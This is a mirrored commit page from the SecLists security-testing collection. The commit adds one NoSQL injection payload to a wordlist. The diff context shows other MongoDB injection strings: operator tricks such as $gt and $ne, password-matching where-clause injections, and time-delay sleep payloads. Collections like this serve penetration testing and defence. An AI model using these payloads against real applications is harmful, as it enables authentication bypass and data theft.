mirror of
https://github.com/danielmiessler/SecLists
synced 2025-12-06 08:53:59 +01:00
Add NoSQL payload
This commit is contained in:
parent
96f8c3f40d
commit
495c8a6c3f
1 changed files with 1 additions and 0 deletions
|
|
@ -15,6 +15,7 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
|
|||
'%20%26%26%20this.password.match(/.*/)//+%00
|
||||
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
|
||||
{$gt: ''}
|
||||
{"$gt": ""}
|
||||
[$ne]=1
|
||||
';sleep(5000);
|
||||
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
|
||||
|
|
|
|||
Loading…
Reference in a new issue